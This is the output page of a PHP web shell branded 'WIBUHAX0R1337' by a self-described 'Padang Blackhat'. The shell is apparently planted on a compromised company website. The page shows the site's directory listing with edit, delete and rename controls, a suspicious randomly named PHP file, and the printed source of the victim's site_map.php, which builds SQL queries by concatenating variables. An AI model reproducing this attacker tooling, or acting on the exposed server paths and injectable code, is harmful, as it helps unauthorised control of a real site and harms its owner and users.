-
WIBUHAX0R1337
-
/
home
/
zqegovsj
/
www
/
us3web.haibo.com.cn
/
zjshinertoys
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
.well-known
--
NONE
cgi-bin
--
NONE
css
--
NONE
factory
--
NONE
factory-s
--
NONE
flag
--
NONE
fonts
--
NONE
icon
--
NONE
image
--
NONE
images
--
NONE
img
--
NONE
js
--
NONE
pic
--
NONE
.htaccess
1.994KB
Edit File
Delete File
Rename
404.php
0.39KB
Edit File
Delete File
Rename
a_feedback.php
1.828KB
Edit File
Delete File
Rename
about.php
3.661KB
Edit File
Delete File
Rename
auth_image.php
0.845KB
Edit File
Delete File
Rename
contact.php
1.564KB
Edit File
Delete File
Rename
factory-02.jpg
899.445KB
Edit File
Delete File
Rename
foot.php
3.283KB
Edit File
Delete File
Rename
function.php
8.523KB
Edit File
Delete File
Rename
head.php
4.461KB
Edit File
Delete File
Rename
lang.php
5.189KB
Edit File
Delete File
Rename
message.php
3.38KB
Edit File
Delete File
Rename
new_section.php
2.25KB
Edit File
Delete File
Rename
news-index.php
3.702KB
Edit File
Delete File
Rename
news.php
3.565KB
Edit File
Delete File
Rename
news2.php
3.772KB
Edit File
Delete File
Rename
oeuonxsj.php
0.742KB
Edit File
Delete File
Rename
page_navigation.php
1.02KB
Edit File
Delete File
Rename
product.php
2.856KB
Edit File
Delete File
Rename
product2.php
5.495KB
Edit File
Delete File
Rename
product_index.php
6.77KB
Edit File
Delete File
Rename
search.php
2.694KB
Edit File
Delete File
Rename
search2.php
1.685KB
Edit File
Delete File
Rename
sectioncontent.php
1.918KB
Edit File
Delete File
Rename
site_map.php
3.982KB
Edit File
Delete File
Rename
sitemap.xml
0.463KB
Edit File
Delete File
Rename
tag.php
1.043KB
Edit File
Delete File
Rename
validate.php
0.221KB
Edit File
Delete File
Rename
webexc.html
0.136KB
Edit File
Delete File
Rename
webexc.php
0.427KB
Edit File
Delete File
Rename
xml.php
2.609KB
Edit File
Delete File
Rename
<? include("function.php"); $aa="site_map.html"; $aaa=$lang['words'][35]; $pagekeyword=$lang['words'][35].','.$company['2']; $pagekeyword2=$lang['words'][35].', '.$company['2'].', '.$company['1'].','.$company['12']; $pagekeyword3=$lang['words'][35].', '.$company['2'].', '.$company['1'].','.$company['12']; include("head.php"); ?><section id="mt_about" style="padding-bottom:100px;"> <div class="container"> <div class="about_services"> <div class="row"> <div class="col-sm-12"> <div class="co-text"> <strong><a href="index.html" class="link"><?=$lang['words'][70]?></A></strong><br> <div class="content_sitemap"> <strong><a href="about.html" class="link"><?=$lang['words'][71]?></A></strong> </div> <div class="content_sitemap"> <strong><?=$lang['words'][128]?></strong> </div> <div class="content_sitemap_products"> <? for($i=0;$i<count($producttype);$i++){?> <UL><LI><a href="<?=$db->turn_name($producttype[$i][2])?>_supply<?=$producttype[$i][0]?>.html" class="link"><?=$producttype[$i][1]?></a><BR><? $producttype2=$db->selectarray("select id,name,name2 from ".$noe_version."_producttypes where level=".$producttype[$i][0]); while(@$b=mysqli_fetch_row($producttype2)){ $sql="select id,name,name2 from ".$noe_version."_producttypes where level=".$b[0]." order by cpt_range ASC"; $res= $db->query($sql); if($res){ $b['child']=$res; }else{ $b['child']=array(); } echo '| '; ?><a href="<?=$db->turn_name($b[2])?>_supply<?=$b[0]?>.html" class="link2"><?=$b[1]?></a><? if($b['child']){?><br/> <? foreach($b['child'] as $k=>$v){?> |- <a href="<?=$db->turn_name($v['name2'])?>_supply<?=$v[id]?>.html" title="<?=$v['name']?>"><?=$v['name']?></a> <? }?><br/> <? }?> <? }?> </LI></UL><? }?> </div> <div class="content_sitemap"> <strong><a href="product.html" class="link"><?=$lang['words'][72]?></a></strong> </div> <div class="content_sitemap_products"> <UL><? $products=$db->selectarray("select id,name,sn,name2 from ".$noe_version."_products order by id desc"); while(@$prod=mysqli_fetch_row($products)){?> <LI><a class="link2" href="<?=$db->turn_name($prod[3])?>_product<?=$prod[0]?>.html"><?=$prod[1]?>: <?=$prod[2]?></A></LI><? }?></UL> </div> <div class="content_sitemap"> <strong><a href="tag.html" class="link">TAG</a></strong> </div> <div class="content_sitemap_products"> <? $keywords=$db->selectarray("select name,id,count(id),name3 from ".$noe_version."_keywords where member_id=".$id." group by name order by count(id) desc"); while(@$ky=mysqli_fetch_row($keywords)){ ?> <a class="link2" href="<?=$ky[3]?>_manufacturer.html"><?=$ky[0]?> (<?=$ky[2]?>); </A><? }?> </div> <? $sections=$db->selectarray("select id,name,name2 from ".$noe_version."_newsection"); while(@$c=mysqli_fetch_row($sections)){ ?> <div class="content_sitemap"><STRONG><A class=link href="<?=$db->turn_name($c[2])?>_page<?=$c[0]?>.html"><?=$c[1]?></A></STRONG></div> <? $section2=$db->selectarray("select id,title,title2 from ".$noe_version."_sectioncontents where type_id= '".$c[0]."'");?><div class="content_sitemap_products"><ul> <? while(@$rs2=mysqli_fetch_array($section2)){?> <li><a href="<?=$db->turn_name($rs2[2])?>_subpage<?=$rs2[0]?>.html" title="<?=$rs2[1]?>" class="link"><?=$rs2[1]?></a></li> <? }?> </ul></div> <? }?> <div class="content_sitemap"> <strong><a href="news.html" class="link"><?=$lang['words'][73]?></a></strong> </div> <div class="content_sitemap_products"><ul> <? $news=$db->selectarray("select id,title,created,type_id,title2 from ".$noe_version."_companynewses"); while(@$b=mysqli_fetch_row($news)){?> <li><A class=link2 href="<?=$db->turn_name($b[4])?>_newsview<?=$b[0]?>.html" ><?=date("Y-m-d",$b[2])?> <?=$b[1]?></a></li> <? }?></ul></div> <div class="content_sitemap"> <strong><A class=link href="site_map.html"><?=$lang['words'][35]?></A></strong> | <a href="sitemap.xml" target="_blank" class="link"><strong>XML</strong></a> </div> <div class="content_sitemap_dow"> <strong><A class=link href="contact.html"><?=$lang['words'][75]?></A></strong> </div> </div> </div> </div> </div> </div> </section> <? include("foot.php"); ?>
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat